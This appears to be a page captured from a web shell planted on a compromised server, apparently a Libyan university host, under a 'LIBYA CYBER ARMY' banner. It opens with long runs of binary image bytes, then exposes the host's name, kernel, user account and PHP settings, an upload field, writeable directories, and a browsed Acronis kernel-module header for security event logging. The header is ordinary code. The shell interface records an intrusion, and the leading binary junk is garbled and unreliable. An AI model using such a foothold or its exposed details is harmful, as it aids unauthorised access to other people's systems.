JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-}JFIFICC_PROFILElcmsmntrRGB XYZ  acspMSFTsawsctrl-hand=@=@t," desc_cprt wtptrXYZ,gXYZ@bXYZTrTRCh`gTRCh`bTRCh`descuRGBtextCC0XYZ TXYZ o8XYZ bXYZ $curv*|uN  bj. C$)j.~39?FWM6Tv\dluV~,6۾ewC    #%$""!&+7/&)4)!"0A149;>>>%.DIC;C  ;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;<" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?|WH?cS?Ne.r˿ޱ5\YYhFOejT7PZ[qs2c/$Ep[Gqo(Nù=QHci;OipX=Ģ8d^mQeӴm1OsL/x2];i6p!zU -/uX!=<-} .
LIBYA CYBER ARMY
Logo of a company Instagram@3g86    Server : Apache
System : Linux uta-edu.server.ly 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : utripoli ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /var/lib/dkms/file_protector/1.1-1549/source/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //var/lib/dkms/file_protector/1.1-1549/source/si_writer_common.h
/**
 @file     si_writer_common.hpp
 @brief    Common writer
 @details  Copyright (c) 2024 Acronis International GmbH
 @author   Denis Kopyrin (Denis.Kopyrin@acronis.com)
 @since    $Id: $
 */

#include <linux/audit.h>
#include <linux/ktime.h>

#include "file_handle_tools.h"
#include "file_path_tools.h"
#include "si_writer.h"
#include "task_info_map.h"
#include "transport.h"

#ifdef KERNEL_MOCK
#include "mock/mock.h"
#define HAVE_UUID_IN_SUPER_BLOCK
#endif

#define SI_ESTIMATE_SIZE_PATH_INFO(path_info) ((path_info).str.length)
#define SI_ESTIMATE_SIZE_FILE_HANDLE_INFO(fh_info) ((fh_info).handle_bytes + sizeof((fh_info).handle_type))

static inline void si_property_writer_write_common(si_property_writer_t* writer, uint64_t event_uid, pid_t pid, pid_t tgid, task_info_t* task_info)
{
  SiTimeMicroseconds eventUs;
  eventUs.microseconds = ktime_to_us(ktime_get_real());
  si_property_writer_write_event_uid(writer, event_uid);
  si_property_writer_write_thread_id(writer, pid);
  si_property_writer_write_process_id(writer, tgid);
  si_property_writer_write_event_timestamp(writer, eventUs);
  si_property_writer_write_process_id_version(writer, task_info ? READ_ONCE(task_info->pid_version) : 0);
}

#define CONV_TIMESPEC(from, to) to.seconds = (uint64_t) ((from).tv_sec); to.nanoseconds = (uint64_t) ((from).tv_nsec)

#define FILE_WRITER_FUNCTIONS_FOR(name) \
static inline void si_property_writer_write_##name##_ids(si_property_writer_t *writer, const struct inode *inode, const file_handle_info_t *fh) { \
	if (inode) { \
		SiTimeSpec t; \
		{ \
			SiObjectId id; \
			id.DeviceId = inode->i_sb->s_dev; \
			id.Id = inode->i_ino; \
			si_property_writer_write_##name##_id(writer, id); \
		} \
 \
		si_property_writer_write_##name##_file_ptr(writer, (uint64_t) inode); \
		si_property_writer_write_##name##_file_generation(writer, inode->i_generation); \
		si_property_writer_write_##name##_file_attributes(writer, inode->i_flags); \
		si_property_writer_write_##name##_file_mode(writer, inode->i_mode); \
		si_property_writer_write_##name##_file_size(writer, i_size_read(inode)); \
		si_property_writer_write_##name##_file_uid(writer, i_uid_read(inode)); \
		si_property_writer_write_##name##_file_gid(writer, i_gid_read(inode)); \
		CONV_TIMESPEC(inode_get_ctime(inode), t); \
		si_property_writer_write_##name##_file_change_time(writer, t); \
		CONV_TIMESPEC(inode_get_mtime(inode), t); \
		si_property_writer_write_##name##_file_modification_time(writer, t); \
		CONV_TIMESPEC(inode_get_atime(inode), t); \
		si_property_writer_write_##name##_file_access_time(writer, t); \
	} \
	if (fh) { \
		si_property_writer_write_##name##_file_mount_id(writer, fh->mnt_id); \
		if (fh->f_handle) \
			si_property_writer_write_##name##_file_handle(writer, fh); \
	} \
} \
static inline void si_property_writer_write_##name##_file(si_property_writer_t *writer, const path_info_t* path_info, const struct inode *inode, const file_handle_info_t *fh) { \
	if (path_info && path_info->buf) { \
		si_property_writer_write_##name##_name(writer, path_info->str); \
	} \
  si_property_writer_write_##name##_ids(writer, inode, fh); \
};

FILE_WRITER_FUNCTIONS_FOR(object)
FILE_WRITER_FUNCTIONS_FOR(target)
#undef FILE_WRITER_FUNCTIONS_FOR
#undef CONV_TIMESPEC

struct volume_id
{
	uint64_t low;
	uint64_t high;
};

static inline void si_property_writer_write_object_ids_and_volume(si_property_writer_t *writer, const struct inode *inode, const file_handle_info_t *fh) {
#ifdef HAVE_UUID_IN_SUPER_BLOCK
	struct volume_id id;
#endif
	si_property_writer_write_object_ids(writer, inode, fh);
#ifdef HAVE_UUID_IN_SUPER_BLOCK
	memcpy(&id, &inode->i_sb->s_uuid, sizeof(id));
	si_property_writer_write_volume_id_low(writer, id.low);
	si_property_writer_write_volume_id_high(writer, id.high);
#endif
	si_property_writer_write_volume_magic(writer, inode->i_sb->s_magic);
}

static inline void si_property_writer_write_object_file_and_volume(si_property_writer_t *writer, const path_info_t* path_info, const struct inode *inode, const file_handle_info_t *fh) {
	if (path_info && path_info->buf) {
		si_property_writer_write_object_name(writer, path_info->str);
	}
  si_property_writer_write_object_ids_and_volume(writer, inode, fh);
}

#undef FILE_WRITER_FUNCTIONS_FOR

static inline void si_property_writer_write_exe_file(si_property_writer_t *writer, const path_info_t* path_info, const struct inode *inode, const file_handle_info_t *fh)
{
	if (path_info && path_info->buf) {
		si_property_writer_write_image_file_name(writer, path_info->str);
	}

  si_property_writer_write_object_ids_and_volume(writer, inode, fh);
	si_property_writer_write_process_file_name_is_not_path(writer, false /*induced from 'inode'*/);
}

static inline void si_property_writer_write_exe_comm(si_property_writer_t *writer, const char* comm)
{
	si_property_writer_write_image_file_name(writer, (SiSizedString){ comm, strlen(comm) });
	si_property_writer_write_process_file_name_is_not_path(writer, true /*induced from 'comm', not 'inode'*/);
}

static inline void si_property_writer_write_creds(si_property_writer_t *writer, const struct cred *cred)
{
	si_property_writer_write_user_id(writer, from_kuid_compat(cred->uid));
	si_property_writer_write_group_id(writer, from_kgid_compat(cred->gid));
	si_property_writer_write_saved_user_id(writer, from_kuid_compat(cred->suid));
	si_property_writer_write_saved_group_id(writer, from_kgid_compat(cred->sgid));
	si_property_writer_write_effective_user_id(writer, from_kuid_compat(cred->euid));
	si_property_writer_write_effective_group_id(writer, from_kgid_compat(cred->egid));
}

static inline void si_property_writer_write_audit(si_property_writer_t *writer, struct task_struct* tsk)
{
	// I am not sure why it is named 'loginuid' but it is outputted as 'auid' everywhere
	si_property_writer_write_audit_user_id(writer, from_kuid_compat(audit_get_loginuid(tsk)));
	si_property_writer_write_audit_session_id(writer, audit_get_sessionid(tsk));
}

static inline void si_property_writer_write_task_creds(si_property_writer_t *writer, struct task_struct* task)
{
	const struct cred *cred;
	rcu_read_lock();
	cred = __task_cred(task);
	if (!cred) {
		// I expect this to never happen
		rcu_read_unlock();
		return;
	}
	si_property_writer_write_creds(writer, cred);
	si_property_writer_write_audit(writer, task);
	rcu_read_unlock();
}

static inline void si_property_writer_write_current_creds(si_property_writer_t *writer)
{
	si_property_writer_write_creds(writer, current_real_cred());
	si_property_writer_write_audit(writer, current);
}

3g86 2022